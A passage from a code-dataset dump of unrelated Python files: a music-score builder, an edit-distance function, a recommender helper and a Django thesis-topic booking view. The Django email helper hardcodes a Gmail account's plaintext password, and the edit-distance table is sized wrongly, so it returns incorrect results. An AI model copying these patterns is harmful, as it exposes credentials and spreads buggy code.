d2l.train(train_iter, test_iter, net, loss, trainer, ctx, num_epochs)\n#\n# train_fine_tuning(finetune_net, 0.01)\n\n\n\n\n# scratch_net = model_zoo.vision.resnet18_v2(classes=2)\n# scratch_net.initialize(init=init.Xavier())\n# train_fine_tuning(scratch_net, 0.1)\n","sub_path":"old_practice/12fine_tuning.py","file_name":"12fine_tuning.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"140228537","text":"import abjad\nimport baca\n\nfrom harmony import library\n\n#########################################################################################\n######################################### 08 [H] 
########################################\n#########################################################################################\n\n\ndef make_empty_score():\n score = library.make_empty_score()\n voices = baca.section.cache_voices(score, library.voice_abbreviations)\n time_signatures = [\n (3, 4),\n (4, 4),\n (3, 4),\n (4, 4),\n (3, 4),\n (4, 4),\n (1, 4),\n (3, 4),\n (3, 4),\n ]\n time_signatures = baca.section.wrap(time_signatures)\n return score, voices, time_signatures\n\n\ndef GLOBALS(skips, rests, first_measure_number):\n stage_markup = (\n (\"[H.1-6]\", 1),\n (\"[H.7-8]\", 8),\n )\n baca.section.label_stage_numbers(skips, stage_markup)\n for index, item in (\n (1 - 1, \"96\"),\n (1 - 1, \"5:3(4)=4\"),\n ):\n skip = skips[index]\n baca.metronome_mark(skip, item, manifests=library.manifests)\n baca.open_volta(skips[8 - 1], first_measure_number)\n for index, string in ((7 - 1, \"short\"),):\n baca.global_fermata(rests[index], string)\n wrappers = baca.markup(\n skips[7 - 1],\n r\"\\harmony-text-seven\",\n abjad.Tweak(r\"- \\tweak extra-offset #'(4 . -30)\"),\n )\n baca.tags.wrappers(wrappers, baca.tags.NOT_PARTS)\n\n\ndef BFL(voice, time_signatures):\n music = baca.make_mmrests(time_signatures(1, 7))\n voice.extend(music)\n durations = [_.duration for _ in time_signatures(8, 9)]\n durations = [sum(durations)]\n weights = abjad.durations([(2, 4), (2, 4), (2, 4)])\n durations = abjad.sequence.split(durations, weights, cyclic=True, overhang=True)\n music = library.make_sixteenths(\n time_signatures(8, 9),\n [-8, -4, 8, -4, 8],\n denominator=None,\n do_not_rewrite_meter=True,\n durations=durations,\n extra_counts=[0, 4, 4],\n )\n voice.extend(music)\n baca.section.append_anchor_note(voice)\n\n\ndef PERC1(voice, time_signatures):\n music = library.make_sixteenths(\n time_signatures(1, 6),\n [1, -11, -1, 1, -14],\n )\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7, 9))\n voice.extend(music)\n\n\ndef PERC2(voice, time_signatures):\n music = baca.make_notes(time_signatures(1, 6))\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7))\n voice.extend(music)\n music = baca.make_notes(time_signatures(8, 9))\n voice.extend(music)\n\n\ndef HP(voice, time_signatures):\n music = library.make_sixteenths(\n time_signatures(1, 6),\n [6, 6, 16],\n do_not_rewrite_meter=True,\n fuse=True,\n written_dotted_halves=([0, 1], 3),\n invisible=([1], 3),\n )\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7))\n voice.extend(music)\n music = baca.make_notes(time_signatures(8, 9))\n voice.extend(music)\n\n\ndef VA(voice, time_signatures):\n music = library.make_sixteenths(\n time_signatures(1, 6),\n [12, 8, 8],\n do_not_rewrite_meter=True,\n fuse=True,\n written_wholes=([1, 2], 3),\n invisible=([2], 3),\n )\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7), head=voice.name)\n voice.extend(music)\n music = baca.make_notes(time_signatures(8, 9))\n voice.extend(music)\n\n\ndef VC1(voice, time_signatures):\n music = library.make_sixteenths(\n time_signatures(1),\n [4, 4, 4],\n )\n voice.extend(music)\n music = library.make_sixteenths(\n time_signatures(2, 6),\n [8, 8, 12],\n do_not_rewrite_meter=True,\n fuse=True,\n written_wholes=([0, 1], 3),\n invisible=([1], 3),\n )\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7), head=voice.name)\n voice.extend(music)\n music = baca.make_notes(time_signatures(8, 9))\n voice.extend(music)\n\n\ndef VC2(voice, time_signatures):\n durations = [_.duration for _ in time_signatures(1, 2)]\n 
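# Hedged illustration (not from the score file, and not abjad's actual
# implementation): the rhythm functions above lean on
# abjad.sequence.split(durations, weights, cyclic=True, overhang=True) to
# chop a fused total duration into repeating weight-sized pieces. A minimal
# stdlib re-creation of that splitting behavior, for orientation only:
from fractions import Fraction

def split_cyclic(total, weights):
    """Split `total` into pieces of the given weights, cycling the weights
    and keeping any final remainder (the 'overhang')."""
    pieces, i = [], 0
    remaining = Fraction(total)
    while remaining > 0:
        piece = min(Fraction(weights[i % len(weights)]), remaining)
        pieces.append(piece)
        remaining -= piece
        i += 1
    return pieces

# A 7/4 total against a repeating 2/4 weight -> 1/2, 1/2, 1/2, 1/4
# (Fractions print in lowest terms).
print(split_cyclic(Fraction(7, 4), [Fraction(2, 4)]))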
durations = [sum(durations)]\n weights = abjad.durations([(3, 4), (4, 4)])\n durations = abjad.sequence.split(durations, weights, cyclic=True, overhang=True)\n music = library.make_sixteenths(\n time_signatures(1, 2),\n [\"+\", 1],\n do_not_rewrite_meter=True,\n durations=durations,\n written_wholes=[1],\n invisible=[-1],\n )\n voice.extend(music)\n music = library.make_sixteenths(\n time_signatures(3, 6),\n [12, 8, 8],\n do_not_rewrite_meter=True,\n fuse=True,\n written_wholes=([1, 2], 3),\n invisible=([2], 3),\n )\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7), head=voice.name)\n voice.extend(music)\n music = baca.make_notes(time_signatures(8, 9))\n voice.extend(music)\n\n\ndef CB1(voice, time_signatures):\n music = library.make_sixteenths(\n time_signatures(1, 3),\n [4, 4, 8, 4, 4, 8, 4, 4],\n )\n voice.extend(music)\n music = library.make_sixteenths(\n time_signatures(4, 6),\n [8, 8, 12],\n do_not_rewrite_meter=True,\n fuse=True,\n written_wholes=([0, 1], 3),\n invisible=([1], 3),\n )\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7), head=voice.name)\n voice.extend(music)\n music = baca.make_notes(time_signatures(8, 9))\n voice.extend(music)\n\n\ndef CB2(voice, time_signatures):\n music = library.make_sixteenths(\n time_signatures(1, 4),\n [12, 16, 12, 15, 1],\n fuse=True,\n do_not_rewrite_meter=True,\n written_wholes=[-2],\n invisible=[-1],\n )\n voice.extend(music)\n music = library.make_sixteenths(\n time_signatures(5, 6),\n [12, 8, 8],\n do_not_rewrite_meter=True,\n fuse=True,\n written_wholes=([1, 2], 3),\n invisible=([2], 3),\n )\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7), head=voice.name)\n voice.extend(music)\n music = baca.make_notes(time_signatures(8, 9))\n voice.extend(music)\n\n\ndef bfl(m):\n with baca.scope(m.get(8, 9)) as o:\n baca.pitch(o, \"Ab3\")\n baca.dynamic(o.phead(0), \"mf\")\n baca.dls_staff_padding(o, 4)\n with baca.scope(baca.select.rleak(o.leaves()[1:])) as u:\n baca.covered_spanner(\n u,\n abjad.Tweak(r\"- \\tweak staff-padding 5.5\"),\n right_broken=True,\n )\n baca.metric_modulation_spanner(\n u,\n abjad.Tweak(r\"- \\tweak staff-padding 8\"),\n right_broken=True,\n )\n\n\ndef perc1(m):\n with baca.scope(m.get(1, 6)) as o:\n baca.staff_lines(o.leaf(0), 1)\n library.brake_drum_staff_position(o)\n baca.dynamic(\n o.phead(0),\n \"f-ancora\",\n abjad.Tweak(r\"- \\tweak self-alignment-X -0.75\"),\n abjad.Tweak(r\"- \\tweak X-extent #'(0 . 
0)\"),\n )\n baca.dls_staff_padding(o, 6)\n baca.markup(\n o.pleaf(0),\n r\"\\baca-brake-drum-markup\",\n abjad.Tweak(r\"- \\tweak staff-padding 6\"),\n )\n\n\ndef perc2(m):\n with baca.scope(m.get(1, 6)) as o:\n library.tam_tam_staff_position(o)\n baca.flat_glissando(\n o,\n hide_middle_stems=True,\n left_broken=True,\n )\n baca.stem_tremolo(o.pleaf(-1))\n with baca.scope(m.get(8, 9)) as o:\n library.tam_tam_staff_position(o)\n baca.flat_glissando(o, hide_middle_stems=True)\n baca.stem_tremolo(abjad.select.get(o.pleaves(), [0, -1]))\n baca.dynamic(o.phead(0), \"pp\")\n baca.dls_staff_padding(o, 6)\n\n\ndef hp(cache):\n name = \"hp\"\n m = cache[name]\n with baca.scope(m.get(1, 6)) as o:\n baca.clef(o.leaf(0), \"treble\")\n baca.staff_lines(o.leaf(0), 5)\n baca.pitch(o, \"\")\n cache.rebuild()\n m = cache[name]\n with baca.scope(m.get(1, 6)) as o:\n baca.stem_tremolo(o.pleaves())\n baca.markup(\n o.pleaf(0),\n r\"\\baca-bisb-markup\",\n abjad.Tweak(r\"- \\tweak staff-padding 5\"),\n )\n with baca.scope(m[1]) as o:\n baca.hairpin(\n o.rleaves(),\n \"p < mf > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[3]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < f > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[5]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < ff > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m.get(8, 9)) as o:\n baca.pitch(o, \"\")\n cache.rebuild()\n m = cache[name]\n with baca.scope(m.get(8, 9)) as o:\n baca.stem_tremolo(o.pleaves())\n baca.dynamic(o.phead(0), \"pp\")\n with baca.scope(m.get(1, 9)) as o:\n baca.dls_staff_padding(o, 4)\n\n\ndef va(cache):\n name = \"va\"\n m = cache[name]\n with baca.scope(m.get(1, 6)) as o:\n baca.stem_tremolo(o.pleaves())\n baca.dynamic(o.phead(0), \"p\")\n baca.markup(\n o.pleaf(0),\n r\"\\baca-quasi-bisb-markup\",\n abjad.Tweak(r\"- \\tweak padding 1.5\"),\n )\n with baca.scope(m[2]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < mf > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[4]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < f > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[6]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < ff >o niente\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m.get(1, 9)) as o:\n baca.dls_staff_padding(o, 4)\n baca.pitch(o, \"\")\n cache.rebuild()\n m = cache[name]\n\n\ndef vc1(cache):\n name = \"vc1\"\n m = cache[name]\n with baca.scope(m[1]) as o:\n # TODO: promote into rhythm:\n baca.repeat_tie(o.leaf(0))\n baca.pitch(o, \"Bb4\")\n baca.espressivo(o.pheads()[1:])\n baca.metric_modulation_spanner(\n o.rleaves(),\n abjad.Tweak(r\"- \\tweak bound-details.right.padding 4.5\"),\n abjad.Tweak(r\"- \\tweak staff-padding 5.5\"),\n left_broken=True,\n )\n with baca.scope(m.get(2, 6)) as o:\n baca.stem_tremolo(o.pleaves())\n baca.markup(\n o.pleaf(0),\n r\"\\baca-quasi-bisb-markup\",\n abjad.Tweak(r\"- \\tweak padding 1.5\"),\n )\n with baca.scope(m[2]) as o:\n baca.hairpin(\n o.rleaves(),\n \"p < mf > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[4]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < f > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[6]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < ff >o niente\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m.get(2, 9)) as o:\n baca.pitch(o, \"\")\n 
cache.rebuild()\n m = cache[name]\n with baca.scope(m.get(1, 9)) as o:\n baca.dls_staff_padding(o, 4)\n\n\ndef vc2(cache):\n name = \"vc2\"\n m = cache[name]\n with baca.scope(m.get(1, 2)) as o:\n # TODO: promote into rhythm:\n baca.repeat_tie(o.leaf(0))\n baca.pitch(o, \"B2\")\n baca.hairpin(\n o.leaves()[-2:],\n \"(p) >o\",\n bookend=False,\n )\n baca.damp_spanner(\n o.rleaves(),\n abjad.Tweak(r\"- \\tweak bound-details.right.padding 4.5\"),\n abjad.Tweak(r\"- \\tweak staff-padding 3\"),\n left_broken=True,\n )\n with baca.scope(m.get(3, 6)) as o:\n baca.stem_tremolo(o.pleaves())\n baca.markup(\n o.pleaf(0),\n r\"\\baca-quasi-bisb-markup\",\n abjad.Tweak(r\"- \\tweak padding 1.5\"),\n )\n with baca.scope(m[3]) as o:\n baca.dynamic(o.phead(0), \"p\")\n with baca.scope(m[4]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < f > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[6]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < ff >o niente\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m.get(3, 9)) as o:\n baca.clef(o.leaf(0), \"treble\")\n baca.pitch(o, \"\")\n cache.rebuild()\n m = cache[name]\n with baca.scope(m.get(1, 9)) as o:\n baca.dls_staff_padding(o, 4)\n\n\ndef cb1(cache):\n name = \"cb1\"\n m = cache[name]\n with baca.scope(m.get(1, 3)) as o:\n baca.repeat_tie(o.leaf(0))\n baca.pitch(o, \"Bb4\", do_not_transpose=True)\n baca.espressivo(o.pheads()[1:])\n with baca.scope(m.get(4, 6)) as o:\n baca.stem_tremolo(o.pleaves())\n baca.markup(\n o.pleaf(0),\n r\"\\baca-quasi-bisb-markup\",\n abjad.Tweak(r\"- \\tweak padding 1.5\"),\n )\n with baca.scope(m[4]) as o:\n baca.hairpin(\n o.rleaves(),\n \"p < f > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[6]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < ff >o niente\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m.get(4, 9)) as o:\n baca.pitch(o, \"\", do_not_transpose=True)\n cache.rebuild()\n m = cache[name]\n with baca.scope(m.get(1, 9)) as o:\n baca.dls_staff_padding(o, 4)\n\n\ndef cb2(cache):\n name = \"cb2\"\n m = cache[name]\n with baca.scope(m.get(1, 4)) as o:\n baca.pitch(o, \"Bb2\")\n baca.hairpin(o.leaves()[-2:], \"(p) >o\", bookend=False)\n baca.damp_spanner(\n o.rleaves(),\n abjad.Tweak(r\"- \\tweak bound-details.right.padding 4.5\"),\n abjad.Tweak(r\"- \\tweak staff-padding 3\"),\n left_broken=True,\n )\n with baca.scope(m.get(5, 6)) as o:\n baca.stem_tremolo(o.pleaves())\n baca.markup(\n o.pleaf(0),\n r\"\\baca-quasi-bisb-markup\",\n abjad.Tweak(r\"- \\tweak padding 1.5\"),\n )\n with baca.scope(m[5]) as o:\n baca.dynamic(o.phead(0), \"p\")\n with baca.scope(m[6]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < ff >o niente\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m.get(5, 9)) as o:\n baca.clef(o.leaf(0), \"treble\")\n baca.pitch(o, \"\", do_not_transpose=True)\n cache.rebuild()\n m = cache[name]\n with baca.scope(m.get(1, 9)) as o:\n baca.dls_staff_padding(o, 4)\n\n\ndef composites(cache):\n for name in [\"va\", \"vc1\", \"vc2\", \"cb1\", \"cb2\"]:\n m = cache[name]\n with baca.scope(m.get(8, 9)) as o:\n baca.note_head_style_harmonic(o.pleaves())\n baca.stem_tremolo(o.pleaves())\n baca.dynamic(o.phead(0), \"pp\")\n baca.markup(\n o.pleaf(0),\n r\"\\baca-quasi-bisb-ancora-markup\",\n abjad.Tweak(r\"- \\tweak padding 1.5\"),\n )\n\n\n@baca.build.timed(\"make_score\")\ndef make_score(first_measure_number, previous_persistent_indicators):\n score, voices, 
time_signatures = make_empty_score()\n baca.section.set_up_score(\n score,\n time_signatures(),\n append_anchor_skip=True,\n always_make_global_rests=True,\n first_measure_number=first_measure_number,\n manifests=library.manifests,\n score_persistent_indicators=previous_persistent_indicators[\"Score\"],\n )\n GLOBALS(score[\"Skips\"], score[\"Rests\"], first_measure_number)\n BFL(voices(\"bfl\"), time_signatures)\n PERC1(voices(\"perc1\"), time_signatures)\n PERC2(voices(\"perc2\"), time_signatures)\n HP(voices(\"hp\"), time_signatures)\n VA(voices(\"va\"), time_signatures)\n VC1(voices(\"vc1\"), time_signatures)\n VC2(voices(\"vc2\"), time_signatures)\n CB1(voices(\"cb1\"), time_signatures)\n CB2(voices(\"cb2\"), time_signatures)\n baca.section.reapply_persistent_indicators(\n voices,\n previous_persistent_indicators,\n manifests=library.manifests,\n )\n cache = baca.section.cache_leaves(\n score,\n len(time_signatures()),\n library.voice_abbreviations,\n )\n bfl(cache[\"bfl\"])\n perc1(cache[\"perc1\"])\n perc2(cache[\"perc2\"])\n hp(cache)\n va(cache)\n vc1(cache)\n vc2(cache)\n cb1(cache)\n cb2(cache)\n composites(cache)\n return score\n\n\ndef main():\n environment = baca.build.read_environment(__file__, baca.build.argv())\n score = make_score(\n environment.first_measure_number,\n environment.previous_metadata[\"persistent_indicators\"],\n environment.timing,\n )\n metadata = baca.section.postprocess_score(\n score,\n environment,\n library.manifests,\n always_make_global_rests=True,\n empty_fermata_measures=True,\n global_rests_in_topmost_staff=True,\n parts_metric_modulation_multiplier=(0.525, 0.525),\n transpose_score=True,\n )\n baca.tags.deactivate(\n score,\n *baca.tags.instrument_color_tags(),\n *baca.tags.short_instrument_name_color_tags(),\n baca.tags.RHYTHM_ANNOTATION_SPANNER,\n )\n baca.tags.activate(\n score,\n baca.tags.LOCAL_MEASURE_NUMBER,\n baca.tags.STAGE_NUMBER,\n )\n lilypond_file = baca.lilypond.file(\n score,\n include_layout_ly=True,\n includes=[\"../stylesheet.ily\"],\n )\n baca.build.persist_lilypond_file(\n environment.arguments,\n environment.section_directory,\n environment.timing,\n lilypond_file,\n metadata,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"harmony/sections/08/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":18216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"611484431","text":"def solution(str1, str2):\n \"\"\"\n 动态规划求解\n :param str1:\n :param str2:\n :return:\n \"\"\"\n str1_length = len(str1)\n str2_length = len(str2)\n \n # 初始化矩阵\n matrix = [[0 for _ in range(str2_length)] for _ in range(str1_length)]\n \n # 初始化边界\n for i in range(str1_length):\n matrix[i][0] = i\n for j in range(str2_length):\n matrix[0][j] = j\n print(matrix)\n \n # 动态规划求解\n for i in range(1, str1_length):\n for j in range(1, str2_length):\n # 如果结尾相同\n if str1[i] == str2[j]:\n matrix[i][j] = matrix[i - 1][j - 1]\n # 如果结尾不同\n else:\n matrix[i][j] = min(matrix[i - 1][j] + 1,\n matrix[i][j - 1] + 1,\n matrix[i - 1][j - 1] + 1)\n \n return matrix[-1][-1]\n\n\nif __name__ == '__main__':\n result = solution('bcd', 'abcde')\n print(result)\n","sub_path":"solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"610946227","text":"import pandas as pd\nimport numpy as np\nfrom IPython.display import clear_output\n\n\ndef get_new_user_matrix(item_df, user_df, 
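# Hedged editor's sketch: the solution2.py entry above sizes its DP table as
# len(str1) x len(str2) and compares str1[i] to str2[j] directly, which drops
# the empty-prefix row/column that Levenshtein distance needs -- the table
# should be (len(str1)+1) x (len(str2)+1), comparing str1[i-1] to str2[j-1].
# A standard corrected formulation, assuming plain edit distance is intended:

def edit_distance(a: str, b: str) -> int:
    m, n = len(a), len(b)
    dp = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(m + 1):
        dp[i][0] = i          # delete all of a[:i]
    for j in range(n + 1):
        dp[0][j] = j          # insert all of b[:j]
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            if a[i - 1] == b[j - 1]:
                dp[i][j] = dp[i - 1][j - 1]
            else:
                dp[i][j] = 1 + min(dp[i - 1][j],      # deletion
                                   dp[i][j - 1],      # insertion
                                   dp[i - 1][j - 1])  # substitution
    return dp[m][n]

assert edit_distance('bcd', 'abcde') == 2   # insert 'a' and 'e'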
rank=50):\n \"\"\"\n Take in a new users ratings, align with the existing item\n factors,and return the user factors\n Args:\n item_df: item factors dataframe resulting from a Spark\n Alternating Least Squares (ALS) Model\n user_df: Pandas dataframe with item_ids and ratings\n Returns:\n new_user_matrix: np.array with calculated new users factors.\n \"\"\"\n # User ratings array\n all_ratings_array = np.array((user_df.rating.tolist(),)).T\n\n # Item factors array\n all_items_array = np.zeros(shape=(user_df.shape[0], rank))\n\n for index, item in user_df.iterrows():\n all_items_array[index, :] = np.array(\n item_df.loc[item_df[\"item_id\"] == item[\"item_id\"].astype(str), \"features\"].item()\n )\n\n # Least squares solution to get user features\n new_user_matrix = np.linalg.lstsq(all_items_array,\n all_ratings_array,\n rcond=None)\n\n # New users matrix!\n new_user_matrix = new_user_matrix[0].reshape((50,))\n\n return new_user_matrix\n\n\ndef get_user_reviews_testing(items_df):\n \"\"\"Take user input and create dataframe added for recommending,\n built for testing in Jupyter Notebook\n Args:\n None\n Returns:\n pd.DataFrame(reviews): Pandas dataframe of users reviews from inputs\n \"\"\"\n # Load data and get random sample of movies with more than 100 reviews\n movie_rand_sample = items_df[\n (items_df[\"item_id\"].astype(str).str.endswith(\"44\")) &\n (items_df[\"count\"] > 50)\n ].sample(n=25)\n reviews = []\n # Give a user input and movie title and take in score\n for index, movie in movie_rand_sample.iterrows():\n print(movie[\"title\"])\n rating = input(\n \"How would you rate this movie? (0-5, OR type 'skip'): \"\n )\n # If user has not seen, can enter skip instead\n if rating == \"skip\":\n clear_output()\n continue\n # Creating dictionary of review and adding to reviews\n else:\n movie_rating = {\"rating\": int(rating), \"item_id\": movie[\"item_id\"]}\n reviews.append(movie_rating)\n clear_output()\n if len(reviews) >= 10:\n return pd.DataFrame(reviews)\n else:\n continue\n\n\ndef get_recommendations(item_factors_df, new_user_df):\n \"\"\"Get recommendations for new user,\n built for testing in Jupyter Notebook\n Args:\n new_user_df: Pandas dataframe with user reviews,\n as generated from get_user_reviews function\n Returns:\n Prints top three recommended comics for new user\n \"\"\"\n user_matrix = get_new_user_matrix(item_factors_df, new_user_df)\n\n item_factors_df[\"new_user_predictions\"] = item_factors_df[\"features\"]\\\n .apply(\n lambda x: np.dot(x, user_matrix)\n )\n\n top_five_comics = item_factors_df.loc[\n item_factors_df[\"item_id\"].astype(str).str.endswith(\"22\"),\n [\"item_id\", \"title\", \"asin\", \"new_user_predictions\"],\n ].sort_values(\"new_user_predictions\", ascending=False)[:5]\n\n return top_five_comics\n","sub_path":"batcave/recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"386894820","text":"import datetime\nimport smtplib\nimport ssl\n\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic import ListView\n\nfrom methodist.models import Methodist\nfrom student.models import Student\nfrom teacher.models import Teacher, TopicOffer, Department, BranchOfKnowledge\nfrom theme.models import WriteWork, Record\n\n\nclass ThemeListView(ListView):\n template_name = 'themes/themes.html'\n model = WriteWork\n\n def get(self, *args, **kwargs):\n self.object_list = 
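# Hedged usage sketch for get_new_user_matrix() above: folding a new user into
# a fixed set of ALS item factors is a plain least-squares solve,
# item_factors @ user_vector ~= ratings. The synthetic shapes below are
# illustrative assumptions, not values from the real model.
import numpy as np

rank = 50
rng = np.random.default_rng(0)
item_factors = rng.normal(size=(25, rank))            # 25 rated items x rank
ratings = rng.integers(1, 6, size=(25, 1)).astype(float)

user_vector, *_ = np.linalg.lstsq(item_factors, ratings, rcond=None)
predicted = item_factors @ user_vector                # rank candidates by this
print(user_vector.shape, predicted.shape)             # (50, 1) (25, 1)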
self.get_queryset()\n if 'mail' not in self.request.session:\n return HttpResponseRedirect('../authorization/')\n return super(ThemeListView, self).get(*args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['user'] = User\n all_records = Record.objects.all()\n context['all_records'] = all_records\n context['branches'] = BranchOfKnowledge.objects.all()\n context['statuses'] = dict(Record.STATUS_TITLE).values()\n year_of_work = datetime.date.today().year\n if datetime.date.today().month >= 9:\n year_of_work = year_of_work + 1\n if self.request.session['role'] == 'student':\n student = Student.objects.get(pk=self.request.session['user_id'])\n study_year = datetime.date.today().year - student.specialty.year_of_entry\n if datetime.date.today().month >= 9:\n study_year = study_year + 1\n context['object_list'] = context['object_list'].filter(year_of_work=datetime.datetime.now().year,\n teacher_offer__year_of_work=year_of_work,\n teacher_offer__year_of_study=study_year,\n teacher_offer__specialty=student.specialty_id) \\\n if type(context['object_list']) != list else context['object_list']\n faculty = Student.objects.filter(student_id=self.request.session['user_id'])[\n 0].specialty.specialty.department.faculty\n context['departments'] = Department.objects.filter(faculty=faculty)\n records = Record.objects.filter(student_id=student).values_list('work', flat=True)\n context['records'] = records\n booked_records = Record.objects.filter(status='CONFIRMED').values_list('work', flat=True)\n context['booked_records'] = booked_records\n this_stud_rec = Record.objects.filter(student_id=student)\n context['is_confirmed'] = False\n for record in this_stud_rec:\n if record.status == 'CONFIRMED':\n context['is_confirmed'] = True\n context['user_work'] = record.work_id\n elif self.request.session['role'] == 'teacher':\n user_department = Teacher.objects.get(pk=self.request.session['user_id']).department\n faculty = user_department.faculty\n context['departments'] = Department.objects.filter(faculty=faculty)\n context['object_list'] = context['object_list'].filter(year_of_work=datetime.datetime.now().year,\n teacher_offer__year_of_work=year_of_work,\n teacher_offer__teacher__department=user_department) \\\n if type(context['object_list']) != list else context['object_list']\n elif self.request.session['role'] == 'methodist':\n user_department = Methodist.objects.get(pk=self.request.session['user_id']).department\n context['object_list'] = context['object_list'].filter(year_of_work=datetime.datetime.now().year,\n teacher_offer__year_of_work=year_of_work,\n teacher_offer__teacher__department=user_department) \\\n if type(context['object_list']) != list else context['object_list']\n else:\n context['departments'] = Department.objects.all()\n return context\n\n def get_queryset(self, **kwargs):\n if self.request.GET.get('department') is not None or self.request.GET.get(\n 'branch') is not None or self.request.GET.get('status') is not None or \\\n self.request.GET.get('interests') is not None:\n department = self.request.GET.get('department')\n branches = self.request.GET.getlist('branch')\n interests = self.request.GET.getlist('interests')\n status = self.request.GET.get('status')\n queryset = []\n empty = True\n if department != 'anything' and department is not None:\n dep = Department.objects.get(department_name=department)\n queryset = WriteWork.objects.filter(teacher_offer__teacher__department=dep,\n year_of_work=datetime.datetime.now().year)\n empty 
= False\n if branches:\n query = WriteWork.objects.filter(branch__branch_name__in=branches,\n year_of_work=datetime.datetime.now().year)\n queryset = list(set(query) & set(queryset)) if queryset else query\n empty = False\n if interests:\n query = WriteWork.objects.filter(\n teacher_offer__teacher__in=Teacher.objects.filter(branch__branch_name__in=interests),\n year_of_work=datetime.datetime.now().year)\n queryset = list(set(query) & set(queryset)) if queryset else query\n empty = False\n if status != 'anything':\n query = None\n if status == 'blocked':\n query = WriteWork.objects.filter(year_of_work=datetime.datetime.now().year,\n pk__in=Record.objects.filter(status='CONFIRMED').values_list(\n 'work', flat=True))\n elif status == 'available':\n query = WriteWork.objects.filter(year_of_work=datetime.datetime.now().year,\n pk__in=Record.objects.filter().exclude(\n status='CONFIRMED').values_list('work', flat=True))\n else:\n all = WriteWork.objects.filter(year_of_work=datetime.datetime.now().year)\n zap = WriteWork.objects.filter(year_of_work=datetime.datetime.now().year,\n pk__in=Record.objects.all().values_list('work', flat=True))\n query = list(set(all) - set(zap))\n queryset = list(set(query) & set(queryset)) if queryset else query\n empty = False\n if not empty:\n return queryset\n\n if self.request.GET.get('theme') is not None:\n student = Student.objects.get(pk=self.request.session['user_id'])\n theme_id = self.request.GET.get('theme')\n theme = WriteWork.objects.get(pk=theme_id)\n Record.objects.filter(student=student, work=theme).delete()\n # send_email_cancel(student, theme)\n\n if self.request.GET.get('theme_id') is not None:\n student = Student.objects.get(pk=self.request.session['user_id'])\n theme_id = self.request.GET.get('theme_id')\n theme = WriteWork.objects.get(pk=theme_id)\n Record.objects.get_or_create(student=student, work=theme)\n # send_email_record(student, theme)\n\n if self.request.GET.get('teacher_name') is not None:\n users = User.objects.filter(first_name__icontains=self.request.GET.get('teacher_name')) \\\n .values_list('id', flat=True)\n teachers = Teacher.objects.filter(teacher_id__in=users).values_list('teacher_id', flat=True)\n places = TopicOffer.objects.filter(teacher__in=teachers).values_list('id', flat=True)\n queryset = WriteWork.objects.filter(year_of_work=datetime.datetime.now().year, teacher_offer__in=places)\n return queryset\n if self.request.GET.get('work_name') is not None:\n queryset = WriteWork.objects.filter(year_of_work=datetime.datetime.now().year,\n work_name__icontains=self.request.GET.get('work_name'))\n return queryset\n return WriteWork.objects.all()\n\n\ndef send_email_record(student, theme):\n port = 465\n smtp_server = \"smtp.gmail.com\"\n sender_email = \"naukma.recording@gmail.com\"\n receiver_email = User.objects.get(pk=theme.teacher_offer.teacher_id).email\n password = 'naukma912'\n message = 'На Вашу тему \"' + theme.work_name + '\" записався студент ' + User.objects.get(pk=student.pk).first_name\n context = ssl.create_default_context()\n try:\n with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:\n server.login(sender_email, password)\n server.sendmail(sender_email, receiver_email, message.encode('utf-8', 'ignore'))\n 